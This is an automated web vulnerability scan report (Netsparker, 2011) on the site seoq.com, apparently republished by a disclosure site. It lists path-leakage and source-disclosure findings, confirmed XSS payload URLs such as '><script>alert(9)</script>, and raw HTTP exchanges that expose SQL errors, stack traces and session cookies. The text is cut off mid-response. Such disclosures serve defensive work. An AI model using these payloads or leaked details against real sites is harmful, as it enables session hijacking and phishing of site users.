XSS, Cross Site Scripting in seoq.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Netsparker - Scan Report Summary

TARGET URL	http://www.seoq.com/quotient/analysis/
SCAN DATE	5/2/2011 2:09:58 AM
REPORT DATE	5/2/2011 12:14:19 PM
SCAN DURATION	00:26:05

Total Requests

Average Speed

req/sec.

126

identified

confirmed

critical

informational

DORK TESTS

PROFILE	Previous Settings
ENABLED ENGINES	Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

Authentication

Scheduled

VULNERABILITIES Vulnerabilities
	IMPORTANT 10 % MEDIUM 21 % LOW 3 % INFORMATION 66 %

VULNERABILITY SUMMARY

Vulnerability Summary

URL	Parameter	Method	Vulnerability	Confirmed
/blvdstatus/			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/alerts.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/contact.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/dynamicJS.debug.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/dynamicJS.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/dynamicJS.php.2009_06_11_r1			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/dynamicJS.php.2009_07_20			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/dynamicJS.php.2009_08_22_r1			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/dynamicJS.php.2009_08_31_r1			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/dynamicJS.php.2009_09_14_r1			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/dynamicJS.php.2009_09_14_r2			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/dynamicJS.php.PREV			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/dynamicJS.php_2008_04_30			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2008_07_11_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2008_07_11_r2			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2008_07_24_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2008_07_25_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2008_07_30_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2008_07_30_r2			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2008_08_06_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2008_08_12_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2008_08_22_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2008_09_10_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2009_03_18_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2009_04_13_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.php_2009_05_05_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/dynamicJS.test.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/initBlvdJS.debug.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/initBlvdJS.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/initBlvdJS.php.PREV			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/initBlvdJS.php_2008_07_25_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/initBlvdJS.php_2008_07_30_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/initBlvdJS.php_2008_08_12_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/initBlvdJS.php_2008_08_12_r2			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/initBlvdJS.php_2008_09_10_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/initBlvdJS.php_2009_03_16_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/initBlvdJS.php_2009_06_12_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/initBlvdJS.test.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/leave.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/proxyJS.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/seotrack.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/trackingJS.debug.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/trackingJS.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/js/trackingJS.php_2008_07_30_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/trackingJS.php_2008_08_06_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/trackingJS.php_2008_08_12_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/trackingJS.php_2008_08_30_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/trackingJS.php_2009_09_13_r1			[Possible] PHP Source Code Disclosure	No
/blvdstatus/js/trackingJS.test.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/keyword-vitals.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/pricing.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/rebrandable.php			[Possible] Internal Path Leakage (*nix)	No
/blvdstatus/stats.php			[Possible] Internal Path Leakage (*nix)	No
/cake/dispatcher.php			[Possible] Internal Path Leakage (*nix)	No
/cake/libs/model/datasources/dbo_source.php			[Possible] Internal Path Leakage (*nix)	No
/cake/libs/model/model.php			[Possible] Internal Path Leakage (*nix)	No
/inqenhancer/sites			Redirect Response BODY Is Too Large	Yes
/quotient/2011/04/22/'%3E%3Cscript%3Ealert(9)%3C/script%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/04/22/1797/%3E%3CiMg%20src=N%20onerror=alert(9)%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/04/22/1798/			Database Error Message	No
/quotient/2011/04/22/1798/%3E%3CiMg%20src=N%20onerror=alert(9)%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/04/22/2270/%3E%3CiMg%20src=N%20onerror=alert(9)%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/04/22/2271/%3E%3CiMg%20src=N%20onerror=alert(9)%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/04/22/2272/%3E%3CiMg%20src=N%20onerror=alert(9)%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/05/01/'%3E%3Cscript%3Ealert(9)%3C/script%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/05/01/2837/%3E%3CiMg%20src=N%20onerror=alert(9)%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/05/01/2838/%3E%3CiMg%20src=N%20onerror=alert(9)%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/05/01/2839/%3E%3CiMg%20src=N%20onerror=alert(9)%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/05/01/2840/%3E%3CiMg%20src=N%20onerror=alert(9)%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/2011/05/01/2841/%3E%3CiMg%20src=N%20onerror=alert(9)%3E	URI-BASED	Raw URI	Cross-site Scripting	Yes
/quotient/analysis/			Cookie Not Marked As HttpOnly	Yes
/quotient/css/			Directory Listing (Apache)	No
/quotient/webanalytics/score_in_xml/			[Possible] Internal Path Leakage (*nix)	No
/quotient/webanalytics/score_in_xml//Code/6			[Possible] Internal Path Leakage (*nix)	No
/quotient/webanalytics/score_in_xml//Crawlability/14			[Possible] Internal Path Leakage (*nix)	No
/quotient/webanalytics/score_in_xml//Credibility/5			[Possible] Internal Path Leakage (*nix)	No
/quotient/webanalytics/score_in_xml/Code/			[Possible] Internal Path Leakage (*nix)	No
/quotient/webanalytics/score_in_xml/Crawlability/			[Possible] Internal Path Leakage (*nix)	No
/quotient/webanalytics/score_in_xml/Credibility/			[Possible] Internal Path Leakage (*nix)	No
/searchengine-analysis/			E-mail Address Disclosure	No
/searchengine-analysis/markovic.com/seo/xml_insert_sitewide_runs.php			[Possible] Internal Path Leakage (*nix)	No
/wp-app.php/service			Forbidden Resource	Yes
/wp-comments-post.php			Internal Server Error	Yes
/wp-content/plugins/google-analyticator/class.analytics.stats.php			[Possible] Internal Path Leakage (*nix)	No
/wp-content/plugins/google-analyticator/google-analyticator.php			[Possible] Internal Path Leakage (*nix)	No
/wp-content/plugins/google-analyticator/google-analytics-stats-widget.php			[Possible] Internal Path Leakage (*nix)	No
/wp-content/plugins/vipers-video-quicktags/readme.txt			[Possible] PHP Source Code Disclosure	No
/wp-content/plugins/vipers-video-quicktags/vipers-video-quicktags.php			[Possible] Internal Path Leakage (*nix)	No
/wp-content/themes/seo-quotient-theme/			Programming Error Message	No
/wp-content/themes/seo-quotient-theme/			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/canonical.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/class.wp-scripts.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/class.wp-styles.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/class-feed.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/class-snoopy.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/comment-template.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/default-embeds.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/default-filters.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/default-widgets.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/feed-atom.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/feed-atom-comments.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/feed-rdf.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/feed-rss.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/feed-rss2.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/feed-rss2-comments.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/general-template.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/kses.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/media.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/ms-default-constants.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/ms-default-filters.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/ms-functions.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/ms-settings.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/nav-menu-template.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/post.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/registration-functions.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/rss.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/rss-functions.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/script-loader.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/shortcodes.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/taxonomy.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/template-loader.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/theme.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/update.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/user.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/vars.php			[Possible] Internal Path Leakage (*nix)	No
/wp-includes/wp-db.php			[Possible] Internal Path Leakage (*nix)	No

Cross-site Scripting

12 TOTAL

IMPORTANT

CONFIRMED

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /quotient/2011/04/22/'%3E%3Cscript%3Ealert(9)%3C/script%3E

/quotient/2011/04/22/'%3E%3Cscript%3Ealert(9)%3C/script%3E CONFIRMED

http://www.seoq.com/quotient/2011/04/22/'%3E%3Cscript%3Ealert(9)%3C/script%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	'><script>alert(9)</script>

Request

GET /quotient/2011/04/22/'%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/04/22/1798/members.multimania.co.uk/zicacan
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=utgikqr0rjtn0dnlkgmg8bu0a3
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:14:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Keep-Alive: timeout=15, max=58
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<pre class="cake-debug"><a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "none")'><b>Warning</b> (512)</a>: <span style = "color:Red;text-align:left"><b>SQL Error:</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'script>' ORDER BY `report_date` DESC LIMIT 2' at line 1</span> [<b>CORE/cake/libs/model/datasources/dbo_source.php</b>, line <b>526</b>]</pre><div id="CakeStackTrace1" class="cake-stack-trace" style="display: none;"><a href='javascript:void(0);' onclick='document.getElementById("CakeErrorCode1").style.display = (document.getElementById("CakeErrorCode1").style.display == "none" ? "" : "none")'>Code</a> | <a href='javascript:void(0);' onclick='document.getElementById("CakeErrorContext1").style.display = (document.getElementById("CakeErrorContext1").style.display == "none" ? "" : "none")'>Context</a><pre id="CakeErrorContext1" class="cake-context" style="display: none;">$sql = "SELECT `Webanalytic`.`id`, `Webanalytic`.`report_date` FROM `seoq_webanalytics` AS `Webanalytic` WHERE id < '><script>netsparker(9)< and site_url LIKE 'script>' ORDER BY `report_date` DESC LIMIT 2"$error = "1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'script>' ORDER BY `report_date` DESC LIMIT 2' at line 1"$out = null</pre><div id="CakeErrorCode1" class="cake-code-dump" style="display: none;"><pre><code><span style="color: #000000">            $out = null;
</span></code><code><span style="color: #000000">            if ($error) {
</span></code><span class="code-highlight"><code><span style="color: #000000">                trigger_error("<span style = \"color:Red;text-align:left\"><b>SQL Error:</b> {$this->error}</span>", E_USER_WARNING);
</span></code></span></pre></div><pre>DboSource::showQuery() - CORE/cake/libs/model/datasources/dbo_source.php, line 526DboSource::execute() - CORE/cake/libs/model/datasources/dbo_source.php, line 202DboSource::fetchAll() - CORE/cake/libs/model/datasources/dbo_source.php, line 337DboSource::read() - CORE/cake/libs/model/datasources/dbo_source.php, line 654Model::find() - CORE/cake/libs/model/model.php, line 2037WebanalyticsController::view() - APP/controllers/webanalytics_controller.php, line 139Object::dispatchMethod() - CORE/cake/libs/object.php, line 125Dispatcher::_invoke() - CORE/cake/dispatcher.php, line 226Dispatcher::dispatch() - CORE/cake/dispatcher.php, line 193[main] - APP/webroot/index.php, line 88</pre></div><pre><p style = "text-align:left"><b>Query:</b> SELECT `Webanalytic`.`id`, `Webanalytic`.`report_date` FROM `seoq_webanalytics` AS `Webanalytic` WHERE id < '><script>netsparker(9)< and site_url LIKE 'script>' ORDER BY `report_date` DESC LIMIT 2 </p></pre><pre class="cake-debug"><a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace2").style.display = (document.getElementById("CakeStackTrace2").style.display == "none" ? "" : "none")'><b>Warning</b> (512)</a>: <span style = "color:Red;text-align:left"><b>SQL Error:</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'script>' and report_date LIKE '2011-04-22%' LIMIT ' at line 1</span> [<b>CORE/cake/libs/model/datasources/dbo_source.php</b>, line <b>526</b>]</pre><div id="CakeStackTrace2" class="cake-stack-trace" style="display: none;"><a href='javascript:void(0);' onclick='document.getElementById("CakeErrorCode2").style.display = (document.getElementById("CakeErrorCode2").style.display == "none" ? "" : "none")'>Code</a> | <a href='javascript:void(0);' onclick='document.getElementById("CakeErrorContext2").style.display = (document.getElementById("CakeErrorContext2").style.display == "none" ? "" : "none")'>Context</a><pre id="CakeErrorContext2" class="cake-context" style="display: none;">$sql = "SELECT `Webanalytic`.`id`, `Webanalytic`.`id_user`, `Webanalytic`.`site_url`, `Webanalytic`.`keywords`, `Webanalytic`.`report_date`, `Webanalytic`.`ip_connection`, `Webanalytic`.`version`, `Webanalytic`.`html`, `Webanalytic`.`content_type`, `Webanalytic`.`http_code`, `Webanalytic`.`http_error_num`, `Webanalytic`.`http_error_msg` FROM `seoq_webanalytics` AS `Webanalytic` WHERE id = '><script>netsparker(9)< and site_url LIKE 'script>' and report_date LIKE '2011-04-22%' LIMIT 1"$error = "1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'script>' and report_date LIKE '2011-04-22%' LIMIT ' at line 1"$out = null</pre><div id="CakeErrorCode2" class="cake-code-dump" style="display: none;"><pre><code><span style="color: #000000">            $out = null;
</span></code><code><span style="color: #000000">            if ($error) {
</span></code><span class="code-highlight"><code><span style="color: #000000">                trigger_error("<span style = \"color:Red;text-align:left\"><b>SQL Error:</b> {$this->error}</span>", E_USER_WARNING);
</span></code></span></pre></div><pre>DboSource::showQuery() - CORE/cake/libs/model/datasources/dbo_source.php, line 526DboSource::execute() - CORE/cake/libs/model/datasources/dbo_source.php, line 202DboSource::fetchAll() - CORE/cake/libs/model/datasources/dbo_source.php, line 337DboSource::read() - CORE/cake/libs/model/datasources/dbo_source.php, line 654Model::find() - CORE/cake/libs/model/model.php, line 2037WebanalyticsController::view() - APP/controllers/webanalytics_controller.php, line 143Object::dispatchMethod() - CORE/cake/libs/object.php, line 125Dispatcher::_invoke() - CORE/cake/dispatcher.php, line 226Dispatcher::dispatch() - CORE/cake/dispatcher.php, line 193[main] - APP/webroot/index.php, line 88</pre></div><pre><p style = "text-align:left"><b>Query:</b> SELECT `Webanalytic`.`id`, `Webanalytic`.`id_user`, `Webanalytic`.`site_url`, `Webanalytic`.`keywords`, `Webanalytic`.`report_date`, `Webanalytic`.`ip_connection`, `Webanalytic`.`version`, `Webanalytic`.`html`, `Webanalytic`.`content_type`, `Webanalytic`.`http_code`, `Webanalytic`.`http_error_num`, `Webanalytic`.`http_error_msg` FROM `seoq_webanalytics` AS `Webanalytic` WHERE id = '><script>netsparker(9)< and site_url LIKE 'script>' and report_date LIKE '2011-04-22%' LIMIT 1 </p></pre><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/'><script>netsparker(9)</script>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="sha..

- /quotient/2011/05/01/'%3E%3Cscript%3Ealert(9)%3C/script%3E

/quotient/2011/05/01/'%3E%3Cscript%3Ealert(9)%3C/script%3E CONFIRMED

http://www.seoq.com/quotient/2011/05/01/'%3E%3Cscript%3Ealert(9)%3C/script%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	'><script>alert(9)</script>

Request

GET /quotient/2011/05/01/'%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/05/01/2841/www.diabeticinsiders.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=utgikqr0rjtn0dnlkgmg8bu0a3
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:14:59 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Keep-Alive: timeout=15, max=3
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<pre class="cake-debug"><a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "none")'><b>Warning</b> (512)</a>: <span style = "color:Red;text-align:left"><b>SQL Error:</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'script>' ORDER BY `report_date` DESC LIMIT 2' at line 1</span> [<b>CORE/cake/libs/model/datasources/dbo_source.php</b>, line <b>526</b>]</pre><div id="CakeStackTrace1" class="cake-stack-trace" style="display: none;"><a href='javascript:void(0);' onclick='document.getElementById("CakeErrorCode1").style.display = (document.getElementById("CakeErrorCode1").style.display == "none" ? "" : "none")'>Code</a> | <a href='javascript:void(0);' onclick='document.getElementById("CakeErrorContext1").style.display = (document.getElementById("CakeErrorContext1").style.display == "none" ? "" : "none")'>Context</a><pre id="CakeErrorContext1" class="cake-context" style="display: none;">$sql = "SELECT `Webanalytic`.`id`, `Webanalytic`.`report_date` FROM `seoq_webanalytics` AS `Webanalytic` WHERE id < '><script>netsparker(9)< and site_url LIKE 'script>' ORDER BY `report_date` DESC LIMIT 2"$error = "1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'script>' ORDER BY `report_date` DESC LIMIT 2' at line 1"$out = null</pre><div id="CakeErrorCode1" class="cake-code-dump" style="display: none;"><pre><code><span style="color: #000000">            $out = null;
</span></code><code><span style="color: #000000">            if ($error) {
</span></code><span class="code-highlight"><code><span style="color: #000000">                trigger_error("<span style = \"color:Red;text-align:left\"><b>SQL Error:</b> {$this->error}</span>", E_USER_WARNING);
</span></code></span></pre></div><pre>DboSource::showQuery() - CORE/cake/libs/model/datasources/dbo_source.php, line 526DboSource::execute() - CORE/cake/libs/model/datasources/dbo_source.php, line 202DboSource::fetchAll() - CORE/cake/libs/model/datasources/dbo_source.php, line 337DboSource::read() - CORE/cake/libs/model/datasources/dbo_source.php, line 654Model::find() - CORE/cake/libs/model/model.php, line 2037WebanalyticsController::view() - APP/controllers/webanalytics_controller.php, line 139Object::dispatchMethod() - CORE/cake/libs/object.php, line 125Dispatcher::_invoke() - CORE/cake/dispatcher.php, line 226Dispatcher::dispatch() - CORE/cake/dispatcher.php, line 193[main] - APP/webroot/index.php, line 88</pre></div><pre><p style = "text-align:left"><b>Query:</b> SELECT `Webanalytic`.`id`, `Webanalytic`.`report_date` FROM `seoq_webanalytics` AS `Webanalytic` WHERE id < '><script>netsparker(9)< and site_url LIKE 'script>' ORDER BY `report_date` DESC LIMIT 2 </p></pre><pre class="cake-debug"><a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace2").style.display = (document.getElementById("CakeStackTrace2").style.display 